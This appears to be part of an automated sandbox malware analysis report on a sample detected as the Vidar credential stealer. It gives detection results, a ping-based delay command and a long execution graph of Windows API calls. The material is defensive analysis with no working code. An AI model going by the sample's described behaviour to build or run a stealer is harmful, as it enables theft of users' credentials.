                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                    • Detection: 7%, ReversingLabs
                                                                                                                                                                                                                                    • Detection: 3%, Virustotal, Browse
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                                    Start time:07:42:32
                                                                                                                                                                                                                                    Start date:30/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:ping -n 5 127.0.0.1
                                                                                                                                                                                                                                    Imagebase:0xce0000
                                                                                                                                                                                                                                    File size:18'944 bytes
                                                                                                                                                                                                                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:18.8%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:17.1%
                                                                                                                                                                                                                                      Total number of Nodes:1367
                                                                                                                                                                                                                                      Total number of Limit Nodes:22
                                                                                                                                                                                                                                      execution_graph 3204 4015c1 3224 402da6 3204->3224 3208 4015d1 3209 401631 3208->3209 3220 4015fa 3208->3220 3222 401617 GetFileAttributesW 3208->3222 3236 405e03 3208->3236 3244 405ad2 3208->3244 3252 405ab5 CreateDirectoryW 3208->3252 3211 401663 3209->3211 3212 401636 3209->3212 3215 401423 24 API calls 3211->3215 3240 401423 3212->3240 3221 40165b 3215->3221 3219 40164a SetCurrentDirectoryW 3219->3221 3220->3208 3247 405a38 CreateDirectoryW 3220->3247 3222->3208 3225 402db2 3224->3225 3255 406544 3225->3255 3228 4015c8 3230 405e81 CharNextW CharNextW 3228->3230 3231 405e9e 3230->3231 3233 405eb0 3230->3233 3231->3233 3234 405eab CharNextW 3231->3234 3232 405ed4 3232->3208 3233->3232 3235 405e03 CharNextW 3233->3235 3234->3232 3235->3233 3237 405e09 3236->3237 3238 405e1f 3237->3238 3239 405e10 CharNextW 3237->3239 3238->3208 3239->3237 3293 405569 3240->3293 3243 406507 lstrcpynW 3243->3219 3304 4068d4 GetModuleHandleA 3244->3304 3248 405a85 3247->3248 3249 405a89 GetLastError 3247->3249 3248->3220 3249->3248 3250 405a98 SetFileSecurityW 3249->3250 3250->3248 3251 405aae GetLastError 3250->3251 3251->3248 3253 405ac5 3252->3253 3254 405ac9 GetLastError 3252->3254 3253->3208 3254->3253 3256 406551 3255->3256 3257 406774 3256->3257 3260 406742 lstrlenW 3256->3260 3261 406659 GetSystemDirectoryW 3256->3261 3265 406544 10 API calls 3256->3265 3266 40666c GetWindowsDirectoryW 3256->3266 3267 4066e3 lstrcatW 3256->3267 3268 406544 10 API calls 3256->3268 3269 40678e 5 API calls 3256->3269 3270 40669b SHGetSpecialFolderLocation 3256->3270 3281 4063d5 3256->3281 3286 40644e wsprintfW 3256->3286 3287 406507 lstrcpynW 3256->3287 3258 402dd3 3257->3258 3288 406507 lstrcpynW 3257->3288 3258->3228 3272 40678e 3258->3272 3260->3256 3261->3256 3265->3260 3266->3256 3267->3256 3268->3256 3269->3256 3270->3256 3271 4066b3 SHGetPathFromIDListW CoTaskMemFree 3270->3271 3271->3256 3273 40679b 3272->3273 3275 406804 CharNextW 3273->3275 3277 405e03 CharNextW 3273->3277 3278 406811 3273->3278 3279 4067f0 CharNextW 3273->3279 3280 4067ff CharNextW 3273->3280 3274 406816 CharPrevW 3274->3278 3275->3273 3275->3278 3276 406837 3276->3228 3277->3273 3278->3274 3278->3276 3279->3273 3280->3275 3289 406374 3281->3289 3284 406439 3284->3256 3285 406409 RegQueryValueExW RegCloseKey 3285->3284 3286->3256 3287->3256 3288->3258 3290 406383 3289->3290 3291 406387 3290->3291 3292 40638c RegOpenKeyExW 3290->3292 3291->3284 3291->3285 3292->3291 3294 405584 3293->3294 3295 401431 3293->3295 3296 4055a0 lstrlenW 3294->3296 3297 406544 17 API calls 3294->3297 3295->3243 3298 4055c9 3296->3298 3299 4055ae lstrlenW 3296->3299 3297->3296 3301 4055dc 3298->3301 3302 4055cf SetWindowTextW 3298->3302 3299->3295 3300 4055c0 lstrcatW 3299->3300 3300->3298 3301->3295 3303 4055e2 SendMessageW SendMessageW SendMessageW 3301->3303 3302->3301 3303->3295 3305 4068f0 3304->3305 3306 4068fa GetProcAddress 3304->3306 3310 406864 GetSystemDirectoryW 3305->3310 3308 405ad9 3306->3308 3308->3208 3309 4068f6 3309->3306 3309->3308 3312 406886 wsprintfW LoadLibraryExW 3310->3312 3312->3309 3974 401c43 3975 402d84 17 API calls 3974->3975 3976 401c4a 3975->3976 3977 402d84 17 API calls 3976->3977 3978 401c57 3977->3978 3979 401c6c 3978->3979 3980 402da6 17 API calls 3978->3980 3981 402da6 17 API calls 3979->3981 3985 401c7c 3979->3985 3980->3979 3981->3985 3982 401cd3 3984 402da6 17 API calls 3982->3984 3983 401c87 3986 402d84 17 API calls 3983->3986 3987 401cd8 3984->3987 3985->3982 3985->3983 3988 401c8c 3986->3988 3990 402da6 17 API calls 3987->3990 3989 402d84 17 API calls 3988->3989 3991 401c98 3989->3991 3992 401ce1 FindWindowExW 3990->3992 3993 401cc3 SendMessageW 3991->3993 3994 401ca5 SendMessageTimeoutW 3991->3994 3995 401d03 3992->3995 3993->3995 3994->3995 3996 4028c4 3997 4028ca 3996->3997 3998 4028d2 FindClose 3997->3998 3999 402c2a 3997->3999 3998->3999 4010 4016cc 4011 402da6 17 API calls 4010->4011 4012 4016d2 GetFullPathNameW 4011->4012 4013 40170e 4012->4013 4014 4016ec 4012->4014 4015 401723 GetShortPathNameW 4013->4015 4016 402c2a 4013->4016 4014->4013 4017 40683d 2 API calls 4014->4017 4015->4016 4018 4016fe 4017->4018 4018->4013 4020 406507 lstrcpynW 4018->4020 4020->4013 4021 401e4e GetDC 4022 402d84 17 API calls 4021->4022 4023 401e60 GetDeviceCaps MulDiv ReleaseDC 4022->4023 4024 402d84 17 API calls 4023->4024 4025 401e91 4024->4025 4026 406544 17 API calls 4025->4026 4027 401ece CreateFontIndirectW 4026->4027 4028 402638 4027->4028 4029 402950 4030 402da6 17 API calls 4029->4030 4031 40295c 4030->4031 4032 402972 4031->4032 4033 402da6 17 API calls 4031->4033 4034 405fd2 2 API calls 4032->4034 4033->4032 4035 402978 4034->4035 4057 405ff7 GetFileAttributesW CreateFileW 4035->4057 4037 402985 4038 402a3b 4037->4038 4039 4029a0 GlobalAlloc 4037->4039 4040 402a23 4037->4040 4041 402a42 DeleteFileW 4038->4041 4042 402a55 4038->4042 4039->4040 4043 4029b9 4039->4043 4044 4032b4 35 API calls 4040->4044 4041->4042 4058 4034af SetFilePointer 4043->4058 4046 402a30 CloseHandle 4044->4046 4046->4038 4047 4029bf 4048 403499 ReadFile 4047->4048 4049 4029c8 GlobalAlloc 4048->4049 4050 4029d8 4049->4050 4051 402a0c 4049->4051 4053 4032b4 35 API calls 4050->4053 4052 4060a9 WriteFile 4051->4052 4054 402a18 GlobalFree 4052->4054 4056 4029e5 4053->4056 4054->4040 4055 402a03 GlobalFree 4055->4051 4056->4055 4057->4037 4058->4047 4059 404ed0 GetDlgItem GetDlgItem 4060 404f22 7 API calls 4059->4060 4066 405147 4059->4066 4061 404fc9 DeleteObject 4060->4061 4062 404fbc SendMessageW 4060->4062 4063 404fd2 4061->4063 4062->4061 4064 405009 4063->4064 4067 406544 17 API calls 4063->4067 4068 404463 18 API calls 4064->4068 4065 405229 4069 4052d5 4065->4069 4078 405282 SendMessageW 4065->4078 4101 40513a 4065->4101 4066->4065 4102 4051b6 4066->4102 4113 404e1e SendMessageW 4066->4113 4072 404feb SendMessageW SendMessageW 4067->4072 4073 40501d 4068->4073 4070 4052e7 4069->4070 4071 4052df SendMessageW 4069->4071 4080 405300 4070->4080 4081 4052f9 ImageList_Destroy 4070->4081 4096 405310 4070->4096 4071->4070 4072->4063 4077 404463 18 API calls 4073->4077 4074 40521b SendMessageW 4074->4065 4075 4044ca 8 API calls 4079 4054d6 4075->4079 4082 40502e 4077->4082 4084 405297 SendMessageW 4078->4084 4078->4101 4085 405309 GlobalFree 4080->4085 4080->4096 4081->4080 4086 405109 GetWindowLongW SetWindowLongW 4082->4086 4092 405104 4082->4092 4095 405081 SendMessageW 4082->4095 4098 4050d3 SendMessageW 4082->4098 4099 4050bf SendMessageW 4082->4099 4083 40548a 4088 40549c ShowWindow GetDlgItem ShowWindow 4083->4088 4083->4101 4087 4052aa 4084->4087 4085->4096 4089 405122 4086->4089 4097 4052bb SendMessageW 4087->4097 4088->4101 4090 405127 ShowWindow 4089->4090 4091 40513f 4089->4091 4111 404498 SendMessageW 4090->4111 4112 404498 SendMessageW 4091->4112 4092->4086 4092->4089 4095->4082 4096->4083 4104 40534b 4096->4104 4118 404e9e 4096->4118 4097->4069 4098->4082 4099->4082 4101->4075 4102->4065 4102->4074 4103 405455 4105 405460 InvalidateRect 4103->4105 4108 40546c 4103->4108 4106 405379 SendMessageW 4104->4106 4107 40538f 4104->4107 4105->4108 4106->4107 4107->4103 4109 405403 SendMessageW SendMessageW 4107->4109 4108->4083 4127 404dd9 4108->4127 4109->4107 4111->4101 4112->4066 4114 404e41 GetMessagePos ScreenToClient SendMessageW 4113->4114 4115 404e7d SendMessageW 4113->4115 4116 404e75 4114->4116 4117 404e7a 4114->4117 4115->4116 4116->4102 4117->4115 4130 406507 lstrcpynW 4118->4130 4120 404eb1 4131 40644e wsprintfW 4120->4131 4122 404ebb 4123 40140b 2 API calls 4122->4123 4124 404ec4 4123->4124 4132 406507 lstrcpynW 4124->4132 4126 404ecb 4126->4104 4133 404d10 4127->4133 4129 404dee 4129->4083 4130->4120 4131->4122 4132->4126 4134 404d29 4133->4134 4135 406544 17 API calls 4134->4135 4136 404d8d 4135->4136 4137 406544 17 API calls 4136->4137 4138 404d98 4137->4138 4139 406544 17 API calls 4138->4139 4140 404dae lstrlenW wsprintfW SetDlgItemTextW 4139->4140 4140->4129 4141 4045d3 lstrlenW 4142 4045f2 4141->4142 4143 4045f4 WideCharToMultiByte 4141->4143 4142->4143 4144 404954 4145 404980 4144->4145 4146 404991 4144->4146 4205 405b4b GetDlgItemTextW 4145->4205 4148 40499d GetDlgItem 4146->4148 4154 4049fc 4146->4154 4149 4049b1 4148->4149 4153 4049c5 SetWindowTextW 4149->4153 4157 405e81 4 API calls 4149->4157 4150 404ae0 4203 404c8f 4150->4203 4207 405b4b GetDlgItemTextW 4150->4207 4151 40498b 4152 40678e 5 API calls 4151->4152 4152->4146 4158 404463 18 API calls 4153->4158 4154->4150 4159 406544 17 API calls 4154->4159 4154->4203 4156 4044ca 8 API calls 4161 404ca3 4156->4161 4162 4049bb 4157->4162 4163 4049e1 4158->4163 4164 404a70 SHBrowseForFolderW 4159->4164 4160 404b10 4165 405ede 18 API calls 4160->4165 4162->4153 4169 405dd6 3 API calls 4162->4169 4166 404463 18 API calls 4163->4166 4164->4150 4167 404a88 CoTaskMemFree 4164->4167 4168 404b16 4165->4168 4170 4049ef 4166->4170 4171 405dd6 3 API calls 4167->4171 4208 406507 lstrcpynW 4168->4208 4169->4153 4206 404498 SendMessageW 4170->4206 4173 404a95 4171->4173 4176 404acc SetDlgItemTextW 4173->4176 4180 406544 17 API calls 4173->4180 4175 4049f5 4178 4068d4 5 API calls 4175->4178 4176->4150 4177 404b2d 4179 4068d4 5 API calls 4177->4179 4178->4154 4186 404b34 4179->4186 4181 404ab4 lstrcmpiW 4180->4181 4181->4176 4183 404ac5 lstrcatW 4181->4183 4182 404b75 4209 406507 lstrcpynW 4182->4209 4183->4176 4185 404b7c 4187 405e81 4 API calls 4185->4187 4186->4182 4191 405e22 2 API calls 4186->4191 4192 404bcd 4186->4192 4188 404b82 GetDiskFreeSpaceW 4187->4188 4190 404ba6 MulDiv 4188->4190 4188->4192 4190->4192 4191->4186 4194 404dd9 20 API calls 4192->4194 4202 404c3e 4192->4202 4193 404c61 4210 404485 KiUserCallbackDispatcher 4193->4210 4196 404c2b 4194->4196 4195 40140b 2 API calls 4195->4193 4198 404c40 SetDlgItemTextW 4196->4198 4199 404c30 4196->4199 4198->4202 4200 404d10 20 API calls 4199->4200 4200->4202 4201 404c7d 4201->4203 4211 4048ad 4201->4211 4202->4193 4202->4195 4203->4156 4205->4151 4206->4175 4207->4160 4208->4177 4209->4185 4210->4201 4212 4048c0 SendMessageW 4211->4212 4213 4048bb 4211->4213 4212->4203 4213->4212 4214 401956 4215 402da6 17 API calls 4214->4215 4216 40195d lstrlenW 4215->4216 4217 402638 4216->4217 4218 4014d7 4219 402d84 17 API calls 4218->4219 4220 4014dd Sleep 4219->4220 4222 402c2a 4220->4222 4223 4020d8 4224 40219c 4223->4224 4225 4020ea 4223->4225 4227 401423 24 API calls 4224->4227 4226 402da6 17 API calls 4225->4226 4228 4020f1 4226->4228 4234 4022f6 4227->4234 4229 402da6 17 API calls 4228->4229 4230 4020fa 4229->4230 4231 402110 LoadLibraryExW 4230->4231 4232 402102 GetModuleHandleW 4230->4232 4231->4224 4233 402121 4231->4233 4232->4231 4232->4233 4243 406943 4233->4243 4237 402132 4240 402142 4237->4240 4241 401423 24 API calls 4237->4241 4238 40216b 4239 405569 24 API calls 4238->4239 4239->4240 4240->4234 4242 40218e FreeLibrary 4240->4242 4241->4240 4242->4234 4248 406529 WideCharToMultiByte 4243->4248 4245 406960 4246 406967 GetProcAddress 4245->4246 4247 40212c 4245->4247 4246->4247 4247->4237 4247->4238 4248->4245 4249 402b59 4250 402b60 4249->4250 4251 402bab 4249->4251 4254 402d84 17 API calls 4250->4254 4257 402ba9 4250->4257 4252 4068d4 5 API calls 4251->4252 4253 402bb2 4252->4253 4255 402da6 17 API calls 4253->4255 4256 402b6e 4254->4256 4258 402bbb 4255->4258 4259 402d84 17 API calls 4256->4259 4258->4257 4260 402bbf IIDFromString 4258->4260 4262 402b7a 4259->4262 4260->4257 4261 402bce 4260->4261 4261->4257 4267 406507 lstrcpynW 4261->4267 4266 40644e wsprintfW 4262->4266 4264 402beb CoTaskMemFree 4264->4257 4266->4257 4267->4264 4268 402a5b 4269 402d84 17 API calls 4268->4269 4270 402a61 4269->4270 4271 402aa4 4270->4271 4272 402a88 4270->4272 4280 40292e 4270->4280 4274 402abe 4271->4274 4275 402aae 4271->4275 4273 402a8d 4272->4273 4276 402a9e 4272->4276 4282 406507 lstrcpynW 4273->4282 4278 406544 17 API calls 4274->4278 4277 402d84 17 API calls 4275->4277 4276->4280 4283 40644e wsprintfW 4276->4283 4277->4276 4278->4276 4282->4280 4283->4280 3856 403adc 3857 403af4 3856->3857 3858 403ae6 CloseHandle 3856->3858 3863 403b21 3857->3863 3858->3857 3864 403b2f 3863->3864 3865 403af9 3864->3865 3866 403b34 FreeLibrary GlobalFree 3864->3866 3867 405c13 3865->3867 3866->3865 3866->3866 3868 405ede 18 API calls 3867->3868 3869 405c33 3868->3869 3870 405c52 3869->3870 3871 405c3b DeleteFileW 3869->3871 3876 405d72 3870->3876 3903 406507 lstrcpynW 3870->3903 3899 403b05 3871->3899 3873 405c78 3874 405c8b 3873->3874 3875 405c7e lstrcatW 3873->3875 3878 405e22 2 API calls 3874->3878 3877 405c91 3875->3877 3879 40683d 2 API calls 3876->3879 3876->3899 3880 405ca1 lstrcatW 3877->3880 3882 405cac lstrlenW FindFirstFileW 3877->3882 3878->3877 3881 405d97 3879->3881 3880->3882 3883 405dd6 3 API calls 3881->3883 3881->3899 3882->3876 3902 405cce 3882->3902 3884 405da1 3883->3884 3887 405bcb 5 API calls 3884->3887 3886 405d55 FindNextFileW 3889 405d6b FindClose 3886->3889 3886->3902 3888 405dad 3887->3888 3890 405db1 3888->3890 3891 405dc7 3888->3891 3889->3876 3894 405569 24 API calls 3890->3894 3890->3899 3893 405569 24 API calls 3891->3893 3893->3899 3896 405dbe 3894->3896 3895 405c13 60 API calls 3895->3902 3898 4062c7 36 API calls 3896->3898 3897 405569 24 API calls 3897->3886 3898->3899 3900 405569 24 API calls 3900->3902 3901 4062c7 36 API calls 3901->3902 3902->3886 3902->3895 3902->3897 3902->3900 3902->3901 3904 406507 lstrcpynW 3902->3904 3905 405bcb 3902->3905 3903->3873 3904->3902 3913 405fd2 GetFileAttributesW 3905->3913 3908 405be6 RemoveDirectoryW 3911 405bf4 3908->3911 3909 405bee DeleteFileW 3909->3911 3910 405bf8 3910->3902 3911->3910 3912 405c04 SetFileAttributesW 3911->3912 3912->3910 3914 405bd7 3913->3914 3915 405fe4 SetFileAttributesW 3913->3915 3914->3908 3914->3909 3914->3910 3915->3914 4284 40175c 4285 402da6 17 API calls 4284->4285 4286 401763 4285->4286 4287 406026 2 API calls 4286->4287 4288 40176a 4287->4288 4288->4288 4289 401d5d 4290 402d84 17 API calls 4289->4290 4291 401d6e SetWindowLongW 4290->4291 4292 402c2a 4291->4292 4293 4054dd 4294 405501 4293->4294 4295 4054ed 4293->4295 4297 405509 IsWindowVisible 4294->4297 4303 405520 4294->4303 4296 4054f3 4295->4296 4305 40554a 4295->4305 4299 4044af SendMessageW 4296->4299 4300 405516 4297->4300 4297->4305 4298 40554f CallWindowProcW 4301 4054fd 4298->4301 4299->4301 4302 404e1e 5 API calls 4300->4302 4302->4303 4303->4298 4304 404e9e 4 API calls 4303->4304 4304->4305 4305->4298 3916 401ede 3924 402d84 3916->3924 3918 401ee4 3919 402d84 17 API calls 3918->3919 3920 401ef0 3919->3920 3921 401f07 EnableWindow 3920->3921 3922 401efc ShowWindow 3920->3922 3923 402c2a 3921->3923 3922->3923 3925 406544 17 API calls 3924->3925 3926 402d99 3925->3926 3926->3918 4306 4028de 4307 4028e6 4306->4307 4308 4028ea FindNextFileW 4307->4308 4311 4028fc 4307->4311 4309 402943 4308->4309 4308->4311 4312 406507 lstrcpynW 4309->4312 4312->4311 4320 401563 4321 402ba4 4320->4321 4324 40644e wsprintfW 4321->4324 4323 402ba9 4324->4323 3340 403f64 3341 403f7c 3340->3341 3342 4040dd 3340->3342 3341->3342 3343 403f88 3341->3343 3344 40412e 3342->3344 3345 4040ee GetDlgItem GetDlgItem 3342->3345 3346 403f93 SetWindowPos 3343->3346 3347 403fa6 3343->3347 3349 404188 3344->3349 3360 401389 2 API calls 3344->3360 3348 404463 18 API calls 3345->3348 3346->3347 3351 403ff1 3347->3351 3352 403faf ShowWindow 3347->3352 3353 404118 SetClassLongW 3348->3353 3354 4040d8 3349->3354 3413 4044af 3349->3413 3357 404010 3351->3357 3358 403ff9 DestroyWindow 3351->3358 3355 4040ca 3352->3355 3356 403fcf GetWindowLongW 3352->3356 3359 40140b 2 API calls 3353->3359 3435 4044ca 3355->3435 3356->3355 3363 403fe8 ShowWindow 3356->3363 3364 404015 SetWindowLongW 3357->3364 3365 404026 3357->3365 3412 4043ec 3358->3412 3359->3344 3361 404160 3360->3361 3361->3349 3366 404164 SendMessageW 3361->3366 3363->3351 3364->3354 3365->3355 3369 404032 GetDlgItem 3365->3369 3366->3354 3367 40140b 2 API calls 3382 40419a 3367->3382 3368 4043ee DestroyWindow KiUserCallbackDispatcher 3368->3412 3371 404060 3369->3371 3372 404043 SendMessageW IsWindowEnabled 3369->3372 3370 40441d ShowWindow 3370->3354 3374 40406d 3371->3374 3375 4040b4 SendMessageW 3371->3375 3376 404080 3371->3376 3386 404065 3371->3386 3372->3354 3372->3371 3373 406544 17 API calls 3373->3382 3374->3375 3374->3386 3375->3355 3379 404088 3376->3379 3380 40409d 3376->3380 3378 404463 18 API calls 3378->3382 3429 40140b 3379->3429 3384 40140b 2 API calls 3380->3384 3381 40409b 3381->3355 3382->3354 3382->3367 3382->3368 3382->3373 3382->3378 3403 40432e DestroyWindow 3382->3403 3416 404463 3382->3416 3385 4040a4 3384->3385 3385->3355 3385->3386 3432 40443c 3386->3432 3388 404215 GetDlgItem 3389 404232 ShowWindow KiUserCallbackDispatcher 3388->3389 3390 40422a 3388->3390 3419 404485 KiUserCallbackDispatcher 3389->3419 3390->3389 3392 40425c EnableWindow 3397 404270 3392->3397 3393 404275 GetSystemMenu EnableMenuItem SendMessageW 3394 4042a5 SendMessageW 3393->3394 3393->3397 3394->3397 3397->3393 3420 404498 SendMessageW 3397->3420 3421 403f45 3397->3421 3424 406507 lstrcpynW 3397->3424 3399 4042d4 lstrlenW 3400 406544 17 API calls 3399->3400 3401 4042ea SetWindowTextW 3400->3401 3425 401389 3401->3425 3404 404348 CreateDialogParamW 3403->3404 3403->3412 3405 40437b 3404->3405 3404->3412 3406 404463 18 API calls 3405->3406 3407 404386 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3406->3407 3408 401389 2 API calls 3407->3408 3409 4043cc 3408->3409 3409->3354 3410 4043d4 ShowWindow 3409->3410 3411 4044af SendMessageW 3410->3411 3411->3412 3412->3354 3412->3370 3414 4044c7 3413->3414 3415 4044b8 SendMessageW 3413->3415 3414->3382 3415->3414 3417 406544 17 API calls 3416->3417 3418 40446e SetDlgItemTextW 3417->3418 3418->3388 3419->3392 3420->3397 3422 406544 17 API calls 3421->3422 3423 403f53 SetWindowTextW 3422->3423 3423->3397 3424->3399 3427 401390 3425->3427 3426 4013fe 3426->3382 3427->3426 3428 4013cb MulDiv SendMessageW 3427->3428 3428->3427 3430 401389 2 API calls 3429->3430 3431 401420 3430->3431 3431->3386 3433 404443 3432->3433 3434 404449 SendMessageW 3432->3434 3433->3434 3434->3381 3436 40458d 3435->3436 3437 4044e2 GetWindowLongW 3435->3437 3436->3354 3437->3436 3438 4044f7 3437->3438 3438->3436 3439 404524 GetSysColor 3438->3439 3440 404527 3438->3440 3439->3440 3441 404537 SetBkMode 3440->3441 3442 40452d SetTextColor 3440->3442 3443 404555 3441->3443 3444 40454f GetSysColor 3441->3444 3442->3441 3445 404566 3443->3445 3446 40455c SetBkColor 3443->3446 3444->3443 3445->3436 3447 404580 CreateBrushIndirect 3445->3447 3448 404579 DeleteObject 3445->3448 3446->3445 3447->3436 3448->3447 4325 401968 4326 402d84 17 API calls 4325->4326 4327 40196f 4326->4327 4328 402d84 17 API calls 4327->4328 4329 40197c 4328->4329 4330 402da6 17 API calls 4329->4330 4331 401993 lstrlenW 4330->4331 4333 4019a4 4331->4333 4332 4019e5 4333->4332 4337 406507 lstrcpynW 4333->4337 4335 4019d5 4335->4332 4336 4019da lstrlenW 4335->4336 4336->4332 4337->4335 4338 40166a 4339 402da6 17 API calls 4338->4339 4340 401670 4339->4340 4341 40683d 2 API calls 4340->4341 4342 401676 4341->4342 4343 402aeb 4344 402d84 17 API calls 4343->4344 4345 402af1 4344->4345 4346 406544 17 API calls 4345->4346 4347 40292e 4345->4347 4346->4347 4348 4026ec 4349 402d84 17 API calls 4348->4349 4350 4026fb 4349->4350 4351 402745 ReadFile 4350->4351 4352 40607a ReadFile 4350->4352 4354 402785 MultiByteToWideChar 4350->4354 4355 40283a 4350->4355 4357 4027ab SetFilePointer MultiByteToWideChar 4350->4357 4358 40284b 4350->4358 4360 402838 4350->4360 4361 4060d8 SetFilePointer 4350->4361 4351->4350 4351->4360 4352->4350 4354->4350 4370 40644e wsprintfW 4355->4370 4357->4350 4359 40286c SetFilePointer 4358->4359 4358->4360 4359->4360 4362 4060f4 4361->4362 4369 40610c 4361->4369 4363 40607a ReadFile 4362->4363 4364 406100 4363->4364 4365 406115 SetFilePointer 4364->4365 4366 40613d SetFilePointer 4364->4366 4364->4369 4365->4366 4367 406120 4365->4367 4366->4369 4368 4060a9 WriteFile 4367->4368 4368->4369 4369->4350 4370->4360 3927 40176f 3928 402da6 17 API calls 3927->3928 3929 401776 3928->3929 3930 401796 3929->3930 3931 40179e 3929->3931 3966 406507 lstrcpynW 3930->3966 3967 406507 lstrcpynW 3931->3967 3934 40179c 3938 40678e 5 API calls 3934->3938 3935 4017a9 3936 405dd6 3 API calls 3935->3936 3937 4017af lstrcatW 3936->3937 3937->3934 3943 4017bb 3938->3943 3939 40683d 2 API calls 3939->3943 3940 405fd2 2 API calls 3940->3943 3942 4017cd CompareFileTime 3942->3943 3943->3939 3943->3940 3943->3942 3944 40188d 3943->3944 3950 406507 lstrcpynW 3943->3950 3953 406544 17 API calls 3943->3953 3959 405b67 MessageBoxIndirectW 3943->3959 3962 401864 3943->3962 3965 405ff7 GetFileAttributesW CreateFileW 3943->3965 3945 405569 24 API calls 3944->3945 3947 401897 3945->3947 3946 405569 24 API calls 3964 401879 3946->3964 3948 4032b4 35 API calls 3947->3948 3949 4018aa 3948->3949 3951 4018be SetFileTime 3949->3951 3952 4018d0 FindCloseChangeNotification 3949->3952 3950->3943 3951->3952 3954 4018e1 3952->3954 3952->3964 3953->3943 3955 4018e6 3954->3955 3956 4018f9 3954->3956 3957 406544 17 API calls 3955->3957 3958 406544 17 API calls 3956->3958 3960 4018ee lstrcatW 3957->3960 3961 401901 3958->3961 3959->3943 3960->3961 3963 405b67 MessageBoxIndirectW 3961->3963 3962->3946 3962->3964 3963->3964 3965->3943 3966->3934 3967->3935 4378 401a72 4379 402d84 17 API calls 4378->4379 4380 401a7b 4379->4380 4381 402d84 17 API calls 4380->4381 4382 401a20 4381->4382 4383 401573 4384 401583 ShowWindow 4383->4384 4385 40158c 4383->4385 4384->4385 4386 40159a ShowWindow 4385->4386 4387 402c2a 4385->4387 4386->4387 4388 403b74 4389 403b7f 4388->4389 4390 403b83 4389->4390 4391 403b86 GlobalAlloc 4389->4391 4391->4390 4392 4023f4 4393 402da6 17 API calls 4392->4393 4394 402403 4393->4394 4395 402da6 17 API calls 4394->4395 4396 40240c 4395->4396 4397 402da6 17 API calls 4396->4397 4398 402416 GetPrivateProfileStringW 4397->4398 4399 4014f5 SetForegroundWindow 4400 402c2a 4399->4400 4401 401ff6 4402 402da6 17 API calls 4401->4402 4403 401ffd 4402->4403 4404 40683d 2 API calls 4403->4404 4405 402003 4404->4405 4407 402014 4405->4407 4408 40644e wsprintfW 4405->4408 4408->4407 3449 4034f7 SetErrorMode GetVersionExW 3450 403581 3449->3450 3451 403549 GetVersionExW 3449->3451 3452 4035da 3450->3452 3453 4068d4 5 API calls 3450->3453 3451->3450 3454 406864 3 API calls 3452->3454 3453->3452 3455 4035f0 lstrlenA 3454->3455 3455->3452 3456 403600 3455->3456 3457 4068d4 5 API calls 3456->3457 3458 403607 3457->3458 3459 4068d4 5 API calls 3458->3459 3460 40360e 3459->3460 3461 4068d4 5 API calls 3460->3461 3462 40361a #17 OleInitialize SHGetFileInfoW 3461->3462 3539 406507 lstrcpynW 3462->3539 3465 403667 GetCommandLineW 3540 406507 lstrcpynW 3465->3540 3467 403679 3468 405e03 CharNextW 3467->3468 3469 40369f CharNextW 3468->3469 3474 4036b0 3469->3474 3470 4037ae 3471 4037c2 GetTempPathW 3470->3471 3541 4034c6 3471->3541 3473 4037da 3475 403834 DeleteFileW 3473->3475 3476 4037de GetWindowsDirectoryW lstrcatW 3473->3476 3474->3470 3477 405e03 CharNextW 3474->3477 3483 4037b0 3474->3483 3551 40307d GetTickCount GetModuleFileNameW 3475->3551 3478 4034c6 12 API calls 3476->3478 3477->3474 3480 4037fa 3478->3480 3480->3475 3482 4037fe GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3480->3482 3481 403847 3484 403a23 ExitProcess OleUninitialize 3481->3484 3488 4038fc 3481->3488 3494 405e03 CharNextW 3481->3494 3487 4034c6 12 API calls 3482->3487 3635 406507 lstrcpynW 3483->3635 3485 403a33 3484->3485 3486 403a48 3484->3486 3661 405b67 3485->3661 3491 403a50 GetCurrentProcess OpenProcessToken 3486->3491 3492 403ac6 ExitProcess 3486->3492 3493 40382c 3487->3493 3579 403bb6 3488->3579 3498 403a96 3491->3498 3499 403a67 LookupPrivilegeValueW AdjustTokenPrivileges 3491->3499 3493->3475 3493->3484 3505 403869 3494->3505 3501 4068d4 5 API calls 3498->3501 3499->3498 3500 40390b 3500->3484 3504 403a9d 3501->3504 3502 4038d2 3636 405ede 3502->3636 3503 403913 3506 405ad2 5 API calls 3503->3506 3508 403ab2 ExitWindowsEx 3504->3508 3511 403abf 3504->3511 3505->3502 3505->3503 3509 403918 lstrcatW 3506->3509 3508->3492 3508->3511 3513 403934 lstrcatW lstrcmpiW 3509->3513 3514 403929 lstrcatW 3509->3514 3512 40140b 2 API calls 3511->3512 3512->3492 3513->3500 3515 403954 3513->3515 3514->3513 3517 403960 3515->3517 3518 403959 3515->3518 3521 405ab5 2 API calls 3517->3521 3520 405a38 4 API calls 3518->3520 3519 4038f1 3651 406507 lstrcpynW 3519->3651 3523 40395e 3520->3523 3524 403965 SetCurrentDirectoryW 3521->3524 3523->3524 3525 403982 3524->3525 3526 403977 3524->3526 3653 406507 lstrcpynW 3525->3653 3652 406507 lstrcpynW 3526->3652 3529 406544 17 API calls 3530 4039c4 DeleteFileW 3529->3530 3531 4039d0 CopyFileW 3530->3531 3536 40398f 3530->3536 3531->3536 3532 403a1a 3534 4062c7 36 API calls 3532->3534 3534->3500 3535 406544 17 API calls 3535->3536 3536->3529 3536->3532 3536->3535 3538 403a04 CloseHandle 3536->3538 3654 4062c7 MoveFileExW 3536->3654 